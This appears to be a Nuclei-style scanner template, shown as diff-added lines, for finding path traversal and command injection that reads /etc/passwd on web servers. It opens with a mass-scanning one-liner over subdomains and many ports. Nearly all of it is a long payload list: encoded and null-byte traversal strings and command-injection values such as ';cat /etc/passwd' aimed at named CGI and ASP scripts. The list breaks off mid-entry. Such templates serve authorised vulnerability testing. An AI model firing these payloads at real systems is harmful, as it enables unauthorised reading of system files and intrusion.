1 + id: logs-passwd 2 + info: 3 + name: logs-passwd 4 + severity: high 5 + author: 6 + - 51pwn 7 + description: |- 8 + cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60 9 + 10 + requests: 11 + - raw: 12 + - | 13 + GET /{{path1}} HTTP/1.1 14 + Host: {{Hostname}} 15 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 16 + 17 + payloads: 18 + path1: 19 + - "%00../../../../../../etc/passwd" 20 + - "%00/etc/passwd%00" 21 + - "%0a/bin/cat%20/etc/passwd" 22 + - "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 23 + - "..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd" 24 + - "................../etc/passwd" 25 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 26 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 27 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 28 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 29 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 30 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 31 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 32 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 33 + - "....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 34 + - 
"....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 35 + - "....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 36 + - "....//....//....//....//....//....//....//....//....//....//....//etc/passwd" 37 + - "....//....//....//....//....//....//....//....//....//....//etc/passwd" 38 + - "....//....//....//....//....//....//....//....//....//etc/passwd" 39 + - "....//....//....//....//....//....//....//....//etc/passwd" 40 + - "....//....//....//....//....//....//....//etc/passwd" 41 + - "....//....//....//....//....//....//etc/passwd" 42 + - "....//....//....//....//....//etc/passwd" 43 + - "....//....//....//....//etc/passwd" 44 + - "....//....//....//etc/passwd" 45 + - "....//....//etc/passwd" 46 + - "....//etc/passwd" 47 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 48 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 49 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 50 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 51 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 52 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 53 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 54 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 55 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 56 + - 
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 57 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 58 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 59 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 60 + - ....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 61 + - ....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 62 + - ....\/....\/....\/....\/....\/....\/....\/etc/passwd 63 + - ....\/....\/....\/....\/....\/....\/etc/passwd 64 + - ....\/....\/....\/....\/....\/etc/passwd 65 + - ....\/....\/....\/....\/etc/passwd 66 + - ....\/....\/....\/etc/passwd 67 + - ....\/....\/etc/passwd 68 + - ....\/etc/passwd" 69 + - ".../.../.../.../.../.../.../.../.../.../etc/passwd" 70 + - "../../../../../../../../../../../../../../../../../../../../../../etc/passwd" 71 + - "../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00" 72 + - "../../../../../../../../../../../../../../../../../../../../../etc/passwd" 73 + - "../../../../../../../../../../../../../../../../../../../../../etc/passwd%00" 74 + - "../../../../../../../../../../../../../../../../../../../../etc/passwd" 75 + - "../../../../../../../../../../../../../../../../../../../../etc/passwd%00" 76 + - "../../../../../../../../../../../../../../../../../../../etc/passwd" 77 + - "../../../../../../../../../../../../../../../../../../../etc/passwd%00" 78 + - "../../../../../../../../../../../../../../../../../../etc/passwd" 79 + - "../../../../../../../../../../../../../../../../../../etc/passwd%00" 80 + - "../../../../../../../../../../../../../../../../../etc/passwd" 81 + - "../../../../../../../../../../../../../../../../../etc/passwd%00" 82 + - "../../../../../../../../../../../../../../../../etc/passwd" 83 + - "../../../../../../../../../../../../../../../../etc/passwd%00" 84 + - "../../../../../../../../../../../../../../../etc/passwd" 
85 + - "../../../../../../../../../../../../../../../etc/passwd%00" 86 + - "../../../../../../../../../../../../../../etc/passwd" 87 + - "../../../../../../../../../../../../../../etc/passwd%00" 88 + - "../../../../../../../../../../../../../etc/passwd" 89 + - "../../../../../../../../../../../../../etc/passwd%00" 90 + - "../../../../../../../../../../../../etc/passwd" 91 + - "../../../../../../../../../../../../etc/passwd%00" 92 + - "../../../../../../../../../../../etc/passwd" 93 + - "../../../../../../../../../../../etc/passwd%00" 94 + - "../../../../../../../../../../etc/passwd" 95 + - "../../../../../../../../../../etc/passwd%00" 96 + - "../../../../../../../../../etc/passwd" 97 + - "../../../../../../../../../etc/passwd%00" 98 + - "../../../../../../../../etc/passwd" 99 + - "../../../../../../../../etc/passwd%00" 100 + - "../../../../../../../etc/passwd" 101 + - "../../../../../../../etc/passwd%00" 102 + - "../../../../../../etc/passwd" 103 + - "../../../../../../etc/passwd%00" 104 + - "../../../../../../etc/passwd&=%3C%3C%3C%3C" 105 + - "../../../../../etc/passwd" 106 + - "../../../../../etc/passwd%00" 107 + - "../../../../etc/passwd" 108 + - "../../../../etc/passwd%00" 109 + - "../../../etc/passwd" 110 + - "../../../etc/passwd%00" 111 + - "../../etc/passwd" 112 + - "../../etc/passwd%00" 113 + - "../etc/passwd" 114 + - "../etc/passwd%00" 115 + - ".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd" 116 + - "%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 117 + - "%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" 118 + - "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd" 119 + - "../../../../../../../../../../../etc/passwd%00.html" 120 + - "../../../../../../../../../../../etc/passwd%00.jpg" 121 + - "../../../../../../../../../../etc/passwd" 122 + - "../../../../../../../../../../etc/passwd^^" 123 + - /..\../..\../..\../..\../..\../..\../etc/passwd 124 + - "./././././././././././etc/passwd" 125 + - 
"//////../../../../../../etc/passwd" 126 + - "//////../../../etc/passwd" 127 + - "/etc/passwd" 128 + - "apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/" 129 + - "cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd" 130 + - "cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 131 + - "etc/passwd" 132 + - "etc/passwd%00" 133 + - "etc/passwd-" 134 + - "etc/passwd~" 135 + - "logs/downloadMainLog?fname=../../../../../../..//etc/passwd" 136 + - "src/etc/passwd" 137 + - "14all-1.1.cgi?cfg=../../../../../../../../etc/passwd" 138 + - "14all.cgi?cfg=../../../../../../../../etc/passwd" 139 + - "DomainFiles/*//../../../../../../../../../../etc/passwd" 140 + - "FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd" 141 + - "FileSeek.cgi?head=&foot=;cat%20/etc/passwd" 142 + - "FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=" 143 + - "FileSeek.cgi?head=;cat%20/etc/passwd|&foot=" 144 + - "FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd" 145 + - "FileSeek2.cgi?head=&foot=;cat%20/etc/passwd" 146 + - "FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=" 147 + - "FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=" 148 + - "PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00" 149 + - "PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd" 150 + - "ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00" 151 + - "Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html" 152 + - "YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00" 153 + - "\\'/bin/cat%20/etc/passwd\\'" 154 + - "a1disp3.cgi?../../../../../../../../../../etc/passwd" 155 + - "a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd" 156 + - "a1stats/a1disp3.cgi?../../../../../../../etc/passwd" 157 + - "a1stats/a1disp4.cgi?../../../../../../../etc/passwd" 158 + - 
"admin.cgi?list=../../../../../../../../../../etc/passwd" 159 + - "admin/exec.php3?cmd=cat%20/etc/passwd" 160 + - "admin/system.php3?cmd=cat%20/etc/passwd" 161 + - "albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd" 162 + - "anacondaclip.pl?template=../../../../../../../../../../etc/passwd" 163 + - "apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/" 164 + - "athenareg.php?pass=%20;cat%20/etc/passwd" 165 + - "atomicboard/index.php?location=../../../../../../../../../../etc/passwd" 166 + - "auktion.cgi?menue=../../../../../../../../../../etc/passwd" 167 + - "autohtml.php?op=modload&mainfile=x&name=/etc/passwd" 168 + - "base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1" 169 + - "basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu" 170 + - "bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd" 171 + - "bb-hist?HISTFILE=../../../../../../../../../../etc/passwd" 172 + - "bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd" 173 + - "bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=" 174 + - "book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10" 175 + - "cal_make.pl?p0=../../../../../../../../../../etc/passwd%00" 176 + - "calendar/calendar_admin.pl?config=|cat%20/etc/passwd|" 177 + - "calendar_admin.pl?config=|cat%20/etc/passwd|" 178 + - "campas?%0acat%0a/etc/passwd%0a" 179 + - "cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd" 180 + - "cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd" 181 + - "cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd" 182 + - "cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd" 183 + - "cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=" 184 + - "cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=" 185 + - 
"cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd" 186 + - "cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd" 187 + - "cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=" 188 + - "cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=" 189 + - "cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00" 190 + - "cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd" 191 + - "cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd" 192 + - "cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd" 193 + - "cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd" 194 + - "cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd" 195 + - "cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd" 196 + - "cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/" 197 + - "cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd" 198 + - "cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd" 199 + - "cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd" 200 + - "cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd" 201 + - "cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=" 202 + - "cgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10" 203 + - "cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00" 204 + - "cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|" 205 + - "cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|" 206 + - "cgi-bin/campas?%0acat%0a/etc/passwd%0a" 207 + - "cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00" 208 + - "cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html" 209 + - 
"cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd" 210 + - "cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 211 + - "cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 212 + - "cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 213 + - "cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 214 + - "cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`" 215 + - "cgi-bin/db4web_c/dbdirname//etc/passwd" 216 + - "cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00" 217 + - "cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00" 218 + - "cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 219 + - "cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 220 + - "cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 221 + - "cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" 222 + - "cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1" 223 + - "cgi-bin/faqmanager.cgi?toc=/etc/passwd%00" 224 + - "cgi-bin/faxsurvey?cat%20/etc/passwd" 225 + - "cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 226 + - "cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 227 + - "cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 228 + - "cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1" 229 + - "cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|" 230 + - "cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00" 231 + - "cgi-bin/htgrep?file=index.html&hdr=/etc/passwd" 232 + - 
"cgi-bin/htmlscript?../../../../../../../../../../etc/passwd" 233 + - "cgi-bin/htsearch?exclude=%60/etc/passwd%60" 234 + - "cgi-bin/ion-p?page=../../../../../etc/passwd" 235 + - "cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd" 236 + - "cgi-bin/magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../../etc/passwd" 237 + - "cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 238 + - "cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00" 239 + - "cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd" 240 + - "cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd" 241 + - "cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd" 242 + - "cgi-bin/multihtml.pl?multi=/etc/passwd%00html" 243 + - "cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd" 244 + - "cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd" 245 + - "cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 246 + - "cgi-bin/opendir.php?/etc/passwd" 247 + - "cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd" 248 + - "cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'" 249 + - "cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd" 250 + - "cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'" 251 + - "cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd" 252 + - "cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd" 253 + - "cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20" 254 + - "cgi-bin/php.cgi?/etc/passwd" 255 + - "cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd" 256 + - "cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10" 257 + - "cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=" 258 + - "cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd" 259 + - 
"cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1" 260 + - "cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00" 261 + - "cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd" 262 + - "cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd" 263 + - "cgi-bin/shop.cgi?page=../../../../../../../etc/passwd" 264 + - "cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd" 265 + - "cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|" 266 + - "cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|" 267 + - "cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|" 268 + - "cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|" 269 + - "cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" 270 + - "cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html" 271 + - "cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd" 272 + - "cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00" 273 + - "cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00" 274 + - "cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1" 275 + - "cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd" 276 + - "cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd" 277 + - "cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd" 278 + - "cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd" 279 + - "cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00" 280 + - "cgi-bin/viewsource?/etc/passwd" 281 + - "cgi-bin/way-board.cgi?db=/etc/passwd%00" 282 + - "cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00" 283 + - "cgi-bin/webbbs/webbbs_config.pl?name=joe&[email protected]&body=aaaaffff&followup=10;cat%20/etc/passwd" 284 + - 
"cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD" 285 + - "cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 286 + - "cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 287 + - "cgi-bin/webplus?script=../../../../../../../../../../etc/passwd" 288 + - "cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd" 289 + - "cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd" 290 + - "cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd" 291 + - "cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd" 292 + - "cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00" 293 + - "cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00" 294 + - "cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00" 295 + - "commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html" 296 + - "common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd" 297 + - "content/base/build/explorer/none.php?/etc/passwd" 298 + - "csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 299 + - "csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 300 + - "csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 301 + - "csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')" 302 + - "csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`" 303 + - "current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00" 304 + - "current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1" 305 + - "db4web_c/dbdirname//etc/passwd" 306 + - "dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00" 307 + - "dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00" 308 + - "dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00" 309 + - "directory.php?dir=%3Bcat%20/etc/passwd" 310 + - 
"directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00" 311 + - "edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd" 312 + - "emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 313 + - "emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 314 + - "emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00" 315 + - "emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00" 316 + - "etc/passwd" 317 + - "ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1" 318 + - "ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" 319 + - "ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1" 320 + - "faqmanager.cgi?toc=/etc/passwd%00" 321 + - "faxsurvey?cat%20/etc/passwd" 322 + - "formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 323 + - "formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 324 + - "formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test" 325 + - "forum-ra.asp?n=../../../../../../../../../etc/passwd" 326 + - "forum-ra.asp?n=../../../../../../../../../etc/passwd%00" 327 + - "forum-ra.asp?n=/etc/passwd" 328 + - "forum-ra.asp?n=/etc/passwd%00" 329 + - "forum-ra_professionnel.asp?n=%60/etc/passwd%60" 330 + - "forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00" 331 + - "forum-ra_professionnel.asp?n=/../../../../../../etc/passwd" 332 + - "forum-ra_professionnel.asp?n=/../../../etc/passwd" 333 + - "forum-ra_professionnel.asp?n=/etc/passwd" 334 + - "forum-ra_professionnel.asp?n=/etc/passwd%00" 335 + - "forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 
336 + - "forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 337 + - "forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 338 + - "forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 339 + - "forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 340 + - "forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 341 + - "forum1.asp?n=%60/etc/passwd%60&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 342 + - "forum1.asp?n=../../../../../../../../../etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 343 + - "forum1.asp?n=/../../../../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 344 + - "forum1.asp?n=/../../../etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 345 + - "forum1.asp?n=/etc/passwd%00&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 346 + - "forum1.asp?n=/etc/passwd&nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 
347 + - "forum1.asp?n=1753&nn=%60/etc/passwd%60" 348 + - "forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd" 349 + - "forum1.asp?n=1753&nn=../../../../../../../../../../etc/passwd%00" 350 + - "forum1.asp?n=1753&nn=/etc/passwd" 351 + - "forum1.asp?n=1753&nn=/etc/passwd%00" 352 + - "forum1_professionnel.asp?n=%60/etc/passwd%60&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 353 + - "forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren" 354 + - "forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec" 355 + - "forum1_professionnel.asp?n=/etc/passwd%00&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 356 + - "forum1_professionnel.asp?n=/etc/passwd&nn=100&page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record." 
357 + - "forum1_professionnel.asp?n=1771&nn=%60/etc/passwd%60&page=1" 358 + - "forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd%00&page=1" 359 + - "forum1_professionnel.asp?n=1771&nn=/../../../../../../../../etc/passwd&page=1" 360 + - "forum1_professionnel.asp?n=1771&nn=/etc/passwd%00&page=1" 361 + - "forum1_professionnel.asp?n=1771&nn=/etc/passwd&page=1" 362 + - "forum1_professionnel.asp?n=1771&nn=100&page=%60/etc/passwd%60" 363 + - "forum1_professionnel.asp?n=1771&nn=100&page=../../../../../../../../../etc/passwd%00" 364 + - "forum1_professionnel.asp?n=1771&nn=100&page=/../../../../../../../../../../etc/passwd" 365 + - "forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd" 366 + - "forum1_professionnel.asp?n=1771&nn=100&page=/etc/passwd%00" 367 + - "forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'." 368 + - "forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'." 369 + - 